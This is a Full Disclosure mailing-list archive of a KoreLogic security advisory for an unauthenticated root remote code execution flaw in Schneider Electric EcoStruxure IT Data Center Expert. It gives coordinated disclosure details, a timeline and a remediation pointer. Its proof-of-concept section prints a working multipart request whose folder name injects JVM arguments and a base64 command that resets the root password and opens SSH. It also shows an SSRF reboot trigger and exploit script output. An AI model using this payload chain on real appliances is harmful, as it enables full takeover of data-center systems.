Full Disclosure mailing list archives

---

From: KoreLogic Disclosures via Fulldisclosure <fulldisclosure () seclists org>
Date: Wed, 9 Jul 2025 17:15:24 -0500

---

KL-001-2025-007: Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Remote Code Execution

Title: Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Remote Code Execution
Advisory ID: KL-001-2025-007
Publication Date: 2025-07-09
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-007.txt


1. Vulnerability Details

     Affected Vendor: Schneider Electric
     Affected Product: EcoStruxure IT Data Center Expert
     Affected Version: 8.3 and prior
     Platform: CentOS
     CWE Classification: CWE-23: Relative Path Traversal,
                         CWE-78: Improper Neutralization of Special
                         Elements used in an OS Command
                         ('OS Command Injection')
     CVE ID: CVE-2025-50121


2. Vulnerability Description

     The Data Center Expert ("DCE") appliance lacks authorization
     controls and allows anyone to masquerade as a NetBotz camera. A
     path traversal vulnerability enables an attacker to create
     a malicious folder name capable of injecting arguments into
     specific shell commands during application boot. By leveraging
     a separate server-side request forgery (SSRF) vulnerability,
     an attacker can chain these two issues to obtain a root shell
     from a completely unauthenticated perspective.


3. Technical Description

     APC NetBotz devices can be configured to report information
     to the Data Center Expert appliance via the DCE web
     application. This information contains various metrics, device
     alerts, and photographs.

     The "/botpost/surveillance" HTTP route enables devices to
     upload images via a multipart POST request. This route does
     not require authentication.

     When an image is uploaded, the first parameter in the POST
     body is loosely parsed as XML. This XML contains the variable
     "nbCameraUid" which is used to construct a folder name that is
     later created on the DCE filesystem. No input validation is
     done for "nbCameraUid", enabling an unauthenticated attacker to
     abuse dot-segments (../) and write a folder with an arbitrary
     name anywhere on the DCE filesystem.

     This behavior is dangerous, as several shell scripts exist on
     the appliance that leverage globbing to build commands that
     are later executed. For example, the "nbfunctions" script uses
     the following snippet to build the "ISXC_CLASSPATH" variable:

         for i in "$NBC_HOME"/tomcat/lib/*.jar; do
             ISXC_CLASSPATH="${ISXC_CLASSPATH}:${i}"
         done"

     This shell script "central.sh" uses the "ISXC_CLASSPATH"
     varible as an argument when starting the Tomcat web server
     after a reboot:

         "$JAVA_HOME"/bin/java -server -Dprocess.name=isxc -Djava.awt.headless=true \
                 $JMEM_OPTS $JGC $JMISC_OPTS ${DEBUG_OPTS:+"$DEBUG_OPTS"} $JMX_OPTS $PROFILE_OPTS \
                 -DMAC_ADDRESS="$MAC_ADDRESS" -DNBC_HOME="$NBC_HOME" -Duser.timezone="$NBC_TIMEZONE" \
                 -Duser.language="$NBC_LANG" -Duser.country="$NBC_COUNTRY" \
-Dorg.apache.cxf.Logger=org.apache.cxf.common.logging.Log4jLogger \
-Dorg.restlet.engine.loggerFacadeClass=org.restlet.ext.slf4j.Slf4jLoggerFacade \
                 -cp $ISXC_CLASSPATH com.netbotz.server.Main

     Since globbing does not differentiate between folders and files,
     it is possible to inject command-line arguments into the "java"
     invocation as long as the folder name ends with the string
     ".jar".

     To exploit this behavior, an attacker can inject the "-Xms1m",
     "-Xmx2m", and "XX:OnOutOfMemoryError" arguments, which severely
     limit the total memory allocated for the "java" runtime. The
     value of the "XX:OnOutOfMemoryError" argument will be executed
     as an additional shell command whenever this limited memory
     is exhausted.


4. Mitigation and Remediation Recommendation

     Version 9.0 of EcoStruxure IT Data Center Expert includes
     fixes for these vulnerabilities and is available upon request
     from Schneider Electric's Customer Care Center. Refer to
https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-189-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2025-189-01.pdf.


5. Credit

     This vulnerability was discovered by Jaggar Henry and Jim
     Becher of KoreLogic, Inc.


6. Disclosure Timeline

     2025-02-14 : KoreLogic reports vulnerability details to
                  Schneider Electric CPCERT.
     2025-02-17 : Vendor acknowledges receipt of KoreLogic's
                  submission.
     2025-02-25 : Vendor confirms the reported vulnerability.
     2025-02-28 : Vendor requests a meeting with KoreLogic to discuss
                  the timeline of remediation efforts for this
                  vulnerability, as well as for associated submissions
                  from KoreLogic.
     2025-03-04 : KoreLogic and Schneider Electric agree to embargo
                  vulnerability details until product update 9.0,
                  circa July, 2025.
     2025-06-20 : Vendor notifies KoreLogic that the publication date
                  for this vulnerability will be 2025-07-08.
     2025-07-08 : Vendor public disclosure.
     2025-07-09 : KoreLogic public disclosure.


7. Proof of Concept

     As a proof-of-concept, the following HTTP request can be sent
     to the DCE appliance:

         POST /botpost/surveillance HTTP/1.1
         Host: victim.com
         Content-Length: 1010
         Content-Type: multipart/form-data; boundary=09b3621e3cb4509abb3722922089bc54

         --09b3621e3cb4509abb3722922089bc54
         Content-Disposition: form-data; name="foo"; filename=""
         Content-Type: application/xml

         <data>
             somePrefix
             timestamp="1627896543210"
             someMiddleData
             nbSerialNum<string-val>00:00:00:00:00:00<
             someMiddleData

             <variable varid="/../../../../../../../../../usr/local/netbotz/nbc/tomcat/lib/zzz -Xms1m -Xmx2m -XX:-OmitStackTraceInFastThrow -XX:OnOutOfMemoryError=echo${IFS}ZWNobyByb290OmtvcmVsb2dpYyB8IGNocGFzc3dkOyBzeXN0ZW1jdGwgc3RhcnQgc3NoZDsgaXB0YWJsZXMgLUkgSU5QVVQgLXAgdGNwIC0tZHBvcnQgMjIgLWogQUNDRVBU|base64$IFS-d|bash -Dfoo=bar.jar" classpath="/nbCameraUid1337"/>

             someMiddleData
             <variable varid="somethingElse" classpath="/nbEnclosureEnc1337"/>
             someSuffix
         </data>
         --09b3621e3cb4509abb3722922089bc54
         Content-Disposition: form-data; name="bar"; filename="korelogic.jpeg"
         Content-Type: image/jpeg

         z
         --09b3621e3cb4509abb3722922089bc54--

     This will create a maliciously named folder in the
     "/usr/local/netbotz/nbc/tomcat/lib/" directory:


         [root@dce ~]# ls /usr/local/netbotz/nbc/tomcat/lib/
          catalina.jar
          catalina-optional.jar
          commons-modeler-2.0.1.jar
          jsp-api.jar
          naming-factory.jar
          naming-resources.jar
          servlet-api.jar
          tomcat-ajp.jar
          tomcat-coyote.jar
          tomcat-http.jar
          tomcat-util.jar

         'zzz -Xms1m -Xmx2m -XX:-OmitStackTraceInFastThrow -XX:OnOutOfMemoryError=echo${IFS}ZWNobyByb290OmtvcmVsb2dpYyB8IGNocGFzc3dkOyBzeXN0ZW1jdGwgc3RhcnQgc3NoZDsgaXB0YWJsZXMgLUkgSU5QVVQgLXAgdGNwIC0tZHBvcnQgMjIgLWogQUNDRVBU|base64$IFS-d|bash -Dfoo=bar.jar'

     When the Tomcat server reboots (either during a system upgrade
     or user initiated), the folder name is globbed and successfully
     injects arguments into the "java" invocation:

         [root@dce ~]# ps aux | grep tomcat

         root       73359  0.0  0.1 7384952 37052 ?       Sl 02:26   0:00 /etc/alternatives/jre/bin/java -cp :/usr/local/netbotz/nbc/jars/activation-1.1.jar:...:/usr/local/netbotz/nbc/tomcat/lib/tomcat-util.jar:/usr/local/netbotz/nbc/tomcat/lib/zzz -Xms1m -Xmx2m -XX:-OmitStackTraceInFastThrow -XX:OnOutOfMemoryError=echo${IFS}ZWNobyByb290OmtvcmVsb2dpYyB8IGNocGFzc3dkOyBzeXN0ZW1jdGwgc3RhcnQgc3NoZDsgaXB0YWJsZXMgLUkgSU5QVVQgLXAgdGNwIC0tZHBvcnQgMjIgLWogQUNDRVBU|base64$IFS-d|bash -Dfoo=bar.jar com.netbotz.server.tools.NBVars -g nbc.timezone

     Due to the injected "Xms" and "Xmx" flags, an "OutOfMemory"
     error is thrown, and the following shell commands are executed
     (after being base64 decoded):

         echo root:korelogic | chpasswd; systemctl start sshd; iptables -I INPUT -p tcp --dport 22 -j ACCEPT

     This effectively changes the "root" password to the string
     "korelogic", enables SSH, and modifies the firewall rules to
     allow access to port 22 (TCP), enabling an attacker to SSH into
     the appliance.

         [goon@security struxureware]$ ssh -t root@192.168.2.90 id
         root@192.168.2.90's password:
         uid=0(root) gid=0(root) groups=0(root)
         Connection to 192.168.2.90 closed.

     When port 80 is enabled, an attacker can leverage a
     separate server-side request forgery (SSRF) vulnerability
     (CVE-2025-50125/KL-001-2025-011) in the "/plugins" route and
     force a restart of the Tomcat server by sending a malformed
     HTTP request. Take for example the following HTTP request:

         rnmf /plugins HTTP/1.1
         Host: 127.0.0.1:7613
         Connection: keep-alive

     The DCE web application unsafely proxies this request to
     a Java service only accessible via the loopback interface.
     The following snippet is from the decompiled JAR responsible
     for this service:

         while (true) {
             final InetAddress local = InetAddress.getByName("127.0.0.1");
             final ServerSocket server = new ServerSocket(7613, 5, local);
             final Socket connect = server.accept();
             this.logger.debug((Object)"Received socket connection...");
             final BufferedReader in = new BufferedReader(new InputStreamReader(connect.getInputStream()));
             String val = in.readLine();
             if (val == null) {
                 val = "";
             }
             final boolean doReboot = val.startsWith("rnmf");

     The code indicates that when a stream of data begins with
     the ASCII characters "rnmf" it is interpreted as a "reboot"
     instruction, and subsequently stops and starts the Tomcat server.

     KoreLogic created a proof-of-concept script named
     "unauth2shell.py" that leverages these two vulnerabilities
     to obtain a shell as the "root" user from a completely
     unauthenticated perspective.

         [attacker@box]$ python unauth2shell.py
         [~] Creating malicious folder...
         [+] Created malicious folder
         [~] Restarting application...
         [+] Restart successfully initiated
         [~] Polling...
         [~] Polling...
         [~] Polling...
         [~] Polling...
         [~] Polling...
         [+] Restart successful

         [root@dce ~]# id
         uid=0(root) gid=0(root) groups=0(root)


The contents of this advisory are copyright(c) 2025
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy

Attachment: OpenPGP_signature.asc
Description: OpenPGP digital signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

---

Current thread:

• KL-001-2025-007: Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Remote Code Execution KoreLogic Disclosures via Fulldisclosure (Jul 09)